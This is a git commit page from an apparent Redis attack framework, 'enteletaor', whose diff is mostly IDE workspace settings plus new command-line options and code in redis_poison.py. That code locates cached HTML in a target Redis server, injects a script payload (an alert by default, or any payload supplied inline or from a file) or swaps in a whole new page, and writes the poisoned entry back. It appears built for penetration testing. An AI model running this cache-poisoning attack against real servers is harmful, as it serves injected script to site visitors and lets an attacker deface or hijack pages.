dash/enteletaor
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add - new options to inject into cache poisoning: payload from comand line, payload from file, complete new HTML file

Browse Source 
add - some visual improvements in argparser
This commit is contained in:
cr0hn
2016-02-18 11:11:59 +01:00
parent 8fb88f3a16
commit 0cf71412be
4 changed files with 179 additions and 103 deletions
Download Patch File Download Diff File Expand all files Collapse all files

168
.idea/workspace.xml generated
View File

@@ -1,13 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ChangeListManager">
<list default="true" id="f21e0167-ea6b-49ab-b506-bdd65f63e425" name="Default" comment="Minor fixes">
<change type="NEW" beforePath="" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" />
<list default="true" id="f21e0167-ea6b-49ab-b506-bdd65f63e425" name="Default" comment="">
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/.idea/workspace.xml" afterPath="$PROJECT_DIR$/.idea/workspace.xml" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/__init__.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/__init__.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_dump.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_dump.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" />
</list>
<ignored path="Enteletaor.iws" />
<ignored path=".idea/workspace.xml" />
@@ -25,7 +23,7 @@
<SUITE FILE_PATH="coverage/Enteletaor$__init__.coverage" NAME="__init__ Coverage Results" MODIFIED="1453676626706" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$USER_HOME$/Documents/Projects/Enteletaor/enteletaor_lib/modules" />
<SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_redis_disconnect.coverage" NAME="enteletaor module redis disconnect Coverage Results" MODIFIED="1455631616654" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
<SUITE FILE_PATH="coverage/Enteletaor$enteletaor_proc_raw_dump.coverage" NAME="enteletaor proc raw-dump Coverage Results" MODIFIED="1455719827469" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
<SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_redis_cache_poison.coverage" NAME="enteletaor module redis cache-poison Coverage Results" MODIFIED="1455758592277" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
<SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_redis_cache_poison.coverage" NAME="enteletaor module redis cache-poison Coverage Results" MODIFIED="1455788650320" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
<SUITE FILE_PATH="coverage/Enteletaor$model.coverage" NAME="model Coverage Results" MODIFIED="1453853975150" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$USER_HOME$/Documents/Projects/Enteletaor/enteletaor_lib/libs" />
<SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_dump.coverage" NAME="enteletaor module redis dump Coverage Results" MODIFIED="1455640099415" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
<SUITE FILE_PATH="coverage/Enteletaor$enteletaor_web.coverage" NAME="enteletaor_web Coverage Results" MODIFIED="1453825208662" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$USER_HOME$/Documents/Projects/Enteletaor" />
@@ -43,24 +41,60 @@
<favorites_list name="Enteletaor" />
</component>
<component name="FileEditorManager">
<leaf>
<file leaf-file-name="redis_poison.py" pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.27591464">
<caret line="66" column="0" selection-start-line="66" selection-start-column="0" selection-end-line="66" selection-end-column="0" />
<folding>
<element signature="e#24#39#0" expanded="true" />
<element signature="e#231#597#0" expanded="false" />
<element signature="e#698#816#0" expanded="false" />
<element signature="e#698#732#1" expanded="true" />
<element signature="e#924#957#1" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
</leaf>
<splitter split-orientation="horizontal" split-proportion="0.5">
<split-first>
<leaf>
<file leaf-file-name="redis_poison.py" pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-0.94871795">
<caret line="90" column="84" selection-start-line="90" selection-start-column="84" selection-end-line="90" selection-end-column="84" />
<folding>
<element signature="e#25#37#0" expanded="true" />
<element signature="e#205#571#0" expanded="false" />
<element signature="e#672#790#0" expanded="false" />
<element signature="e#672#706#1" expanded="true" />
<element signature="e#898#931#1" expanded="true" />
<element signature="e#2962#2998#1" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
</leaf>
</split-first>
<split-second>
<leaf>
<file leaf-file-name="redis_poison.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="148" column="20" selection-start-line="148" selection-start-column="20" selection-end-line="148" selection-end-column="20" />
<folding>
<element signature="e#672#790#0" expanded="false" />
<element signature="e#672#706#1" expanded="true" />
<element signature="e#898#931#1" expanded="true" />
<element signature="e#2962#2998#1" expanded="true" />
<marker date="1455790160000" expanded="true" signature="25:76" placeholder="import ..." />
<marker date="1455790160000" expanded="true" signature="896:2839" placeholder="..." />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="cmd_actions.py" pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.32478634">
<caret line="20" column="0" selection-start-line="20" selection-start-column="0" selection-end-line="20" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
</file>
</leaf>
</split-second>
</splitter>
</component>
<component name="FileTemplateManagerImpl">
<option name="RECENT_TEMPLATES">
@@ -119,7 +153,6 @@
<option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_disconnect.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_discover_db.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/proc_dump.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" />
<option value="$PROJECT_DIR$/ATTACKS.md" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/__init__.py" />
<option value="$PROJECT_DIR$/.gitignore" />
@@ -127,6 +160,7 @@
<option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_dump.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/__init__.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py" />
<option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" />
</list>
@@ -140,8 +174,8 @@
<component name="ProjectFrameBounds">
<option name="x" value="4" />
<option name="y" value="23" />
<option name="width" value="1276" />
<option name="height" value="777" />
<option name="width" value="1916" />
<option name="height" value="1057" />
</component>
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="Add" />
@@ -659,11 +693,17 @@
<option name="project" value="LOCAL" />
<updated>1455720146783</updated>
</task>
<option name="localTasksCounter" value="5" />
<task id="LOCAL-00005" summary="Add: new redis attack - cache poison">
<created>1455759358999</created>
<option name="number" value="00005" />
<option name="project" value="LOCAL" />
<updated>1455759358999</updated>
</task>
<option name="localTasksCounter" value="6" />
<servers />
</component>
<component name="ToolWindowManager">
<frame x="4" y="23" width="1276" height="777" extended-state="6" />
<frame x="4" y="23" width="1916" height="1057" extended-state="6" />
<editor active="true" />
<layout>
<window_info id="TODO" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="6" side_tool="false" content_ui="tabs" />
@@ -673,12 +713,12 @@
<window_info id="Version Control" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.32953367" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Run" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.3562044" sideWeight="0.4946581" order="2" side_tool="false" content_ui="tabs" />
<window_info id="Terminal" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.34818652" sideWeight="0.4957265" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.22564936" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.22542734" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Database" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs" />
<window_info id="Find" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.32746115" sideWeight="0.4957265" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Structure" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Favorites" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="true" content_ui="tabs" />
<window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4729927" sideWeight="0.491453" order="3" side_tool="false" content_ui="tabs" />
<window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4310881" sideWeight="0.491453" order="3" side_tool="false" content_ui="tabs" />
<window_info id="Cvs" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="4" side_tool="false" content_ui="tabs" />
<window_info id="Message" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Commander" active="false" anchor="right" auto_hide="false" internal_type="SLIDING" type="SLIDING" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
@@ -703,7 +743,8 @@
<MESSAGE value="Fix: A lot of improvements in framework.&#10;Add: 5 new attacks in redis module" />
<MESSAGE value="Minor fixes" />
<MESSAGE value="add: new attack family - proc&#10;add: new attack for redis- discover-dbs" />
<option name="LAST_COMMIT_MESSAGE" value="add: new attack family - proc&#10;add: new attack for redis- discover-dbs" />
<MESSAGE value="Add: new redis attack - cache poison" />
<option name="LAST_COMMIT_MESSAGE" value="Add: new redis attack - cache poison" />
</component>
<component name="XDebuggerManager">
<breakpoint-manager>
@@ -724,7 +765,7 @@
</properties>
</breakpoint>
</default-breakpoints>
<option name="time" value="279" />
<option name="time" value="285" />
</breakpoint-manager>
<watches-manager>
<configuration name="PythonConfigurationType">
@@ -1209,14 +1250,6 @@
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.33709678">
<caret line="13" column="0" selection-start-line="13" selection-start-column="0" selection-end-line="13" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/api.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.18387097">
@@ -1273,19 +1306,7 @@
<state vertical-scroll-proportion="0.2682927">
<caret line="41" column="0" selection-start-line="41" selection-start-column="0" selection-end-line="41" selection-end-column="0" />
<folding>
<element signature="e#25#35#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.38832998">
<caret line="43" column="39" selection-start-line="43" selection-start-column="39" selection-end-line="43" selection-end-column="39" />
<folding>
<element signature="e#25#39#0" expanded="true" />
<element signature="e#772#904#0" expanded="false" />
<element signature="e#1009#1067#1" expanded="true" />
<element signature="e#25#35#0" expanded="false" />
</folding>
</state>
</provider>
@@ -1300,24 +1321,45 @@
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.16239317">
<caret line="10" column="4" selection-start-line="10" selection-start-column="4" selection-end-line="10" selection-end-column="4" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.3707265">
<caret line="42" column="27" selection-start-line="42" selection-start-column="27" selection-end-line="42" selection-end-column="27" />
<folding>
<element signature="e#25#39#0" expanded="true" />
<element signature="e#772#904#0" expanded="false" />
<element signature="e#1009#1067#1" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.40140846">
<caret line="8" column="5" selection-start-line="8" selection-start-column="5" selection-end-line="8" selection-end-column="5" />
<state vertical-scroll-proportion="0.32478634">
<caret line="20" column="0" selection-start-line="20" selection-start-column="0" selection-end-line="20" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.27591464">
<caret line="66" column="0" selection-start-line="66" selection-start-column="0" selection-end-line="66" selection-end-column="0" />
<state vertical-scroll-proportion="-0.94871795">
<caret line="90" column="84" selection-start-line="90" selection-start-column="84" selection-end-line="90" selection-end-column="84" />
<folding>
<element signature="e#24#39#0" expanded="true" />
<element signature="e#231#597#0" expanded="false" />
<element signature="e#698#816#0" expanded="false" />
<element signature="e#698#732#1" expanded="true" />
<element signature="e#924#957#1" expanded="true" />
<element signature="e#25#37#0" expanded="true" />
<element signature="e#205#571#0" expanded="false" />
<element signature="e#672#790#0" expanded="false" />
<element signature="e#672#706#1" expanded="true" />
<element signature="e#898#931#1" expanded="true" />
<element signature="e#2962#2998#1" expanded="true" />
</folding>
</state>
</provider>

10
enteletaor_lib/modules/proc/cmd_actions.py
View File

@@ -7,7 +7,9 @@ This file contains command line actions for argparser
# ----------------------------------------------------------------------
def parser_proc_raw_dump(parser):
parser.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
help="although all information be dumped do not stop")
parser.add_argument("-I", dest="interval", type=float, default=4,
help="timeout interval between tow connections")
gr = parser.add_argument_group("custom raw dump options")
gr.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
help="although all information be dumped do not stop")
gr.add_argument("-I", dest="interval", type=float, default=4,
help="timeout interval between tow connections")

30
enteletaor_lib/modules/redis/cmd_actions.py
View File

@@ -10,21 +10,33 @@ def parser_redis_dump(parser):
"""
Dump all redis database information
"""
parser.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
help="do not show displays raw database info into screen")
gr = parser.add_argument_group("custom raw dump options")
gr.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
help="do not show displays raw database info into screen")
# ----------------------------------------------------------------------
def parser_redis_server_disconnect(parser):
parser.add_argument("-c", action="store", dest="client", help="user to disconnect")
parser.add_argument("--all", action="store_true", dest="disconnect_all", default=False,
help="disconnect all users")
gr = parser.add_argument_group("custom disconnect options")
gr.add_argument("-c", action="store", dest="client", help="user to disconnect")
gr.add_argument("--all", action="store_true", dest="disconnect_all", default=False,
help="disconnect all users")
# ----------------------------------------------------------------------
def parser_redis_server_cache_poison(parser):
parser.add_argument("--search", action="store_true", dest="search_cache", default=False,
help="try to find cache info stored in Redis")
parser.add_argument("--cache-key", action="store", dest="cache_key",
help="try to poisoning using selected key")
gr = parser.add_argument_group("custom poison options")
gr.add_argument("--search", action="store_true", dest="search_cache", default=False,
help="try to find cache info stored in Redis")
gr.add_argument("--cache-key", action="store", dest="cache_key",
help="try to poisoning using selected key")
payload = parser.add_argument_group("payloads options")
payload.add_argument("--payload", action="store", dest="poison_payload",
help="try inject cmd inline payload")
payload.add_argument("--file-payload", action="store", dest="poison_payload_file",
help="try inject selected payload reading from a file")
payload.add_argument("--replace-html", action="store", dest="new_html",
help="replace cache content with selected file content")

74
enteletaor_lib/modules/redis/redis_poison.py
View File

@@ -1,6 +1,5 @@
# -*- coding: utf-8 -*-
import binascii
import six
import redis
import logging
@@ -50,7 +49,14 @@ def handle_html(config, content):
"""
# --------------------------------------------------------------------------
# Prepare info
# Selected custom HTML file?
# --------------------------------------------------------------------------
if config.new_html is not None:
with open(config.new_html, "rU") as f:
return f.read()
# --------------------------------------------------------------------------
# Search start and end possition of HTML page
# --------------------------------------------------------------------------
for i, x in enumerate(content):
if chr(x) == "<":
@@ -63,10 +69,7 @@ def handle_html(config, content):
break
if pos_ini is None or pos_end is None:
return None
# prefix = content[:pos_ini]
# suffix = content[pos_end:]
raise ValueError("Not found HTML content into cache")
txt_content = content[pos_ini:pos_end]
@@ -74,31 +77,39 @@ def handle_html(config, content):
tree = etree.fromstring(txt_content, etree.HTMLParser())
doc_root = tree.getroottree()
# Find an insert script injection
for point in ("title", "body"):
results = None
# Search insertion points
for point in ("head", "title", "body", "script", "div", "p"):
insert_point = doc_root.find(".//%s" % point)
if insert_point is None:
continue
# Add the injection
ss = etree.Element("script")
ss.text = "alert(1)"
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
insert_point.addnext(ss)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = "<script>alert('You're broker injection vulnerable')</script>"
insert_point.addnext(payload)
# Set results
results = bytes(etree.tostring(doc_root))
# Found and insert point -> break
break
# --------------------------------------------------------------------------
# Fix results
# Build results
# --------------------------------------------------------------------------
# Result
# result = bytearray(prefix) + bytearray(etree.tostring(doc_root)) + bytearray(suffix)
return bytes(etree.tostring(doc_root))
# return bytes(result)
return results
# ----------------------------------------------------------------------
@@ -120,7 +131,7 @@ def action_redis_cache_poison(config):
cache_keys = [config.cache_key]
# --------------------------------------------------------------------------
# Find caches
# Find cache keys
# --------------------------------------------------------------------------
if config.search_cache is True:
log.error("Looking for caches in '%s'..." % config.target)
@@ -146,15 +157,24 @@ def action_redis_cache_poison(config):
continue
# --------------------------------------------------------------------------
# Action over caches
# Make actions over cache
# --------------------------------------------------------------------------
# Modify
modified = handle_html(config, content)
# Set injection
try:
modified = handle_html(config, content)
except ValueError as e:
log.error("Can't modify cache content: " % e)
continue
except IOError as e:
log.error("Can't modify cache content: " % e)
# Injection was successful?
if modified is None:
log.warning("Can't modify content")
log.warning("Can't modify content: ensure that content is HTML")
continue
# Reset information
# Set injection into server
con.setex(val, 200, modified)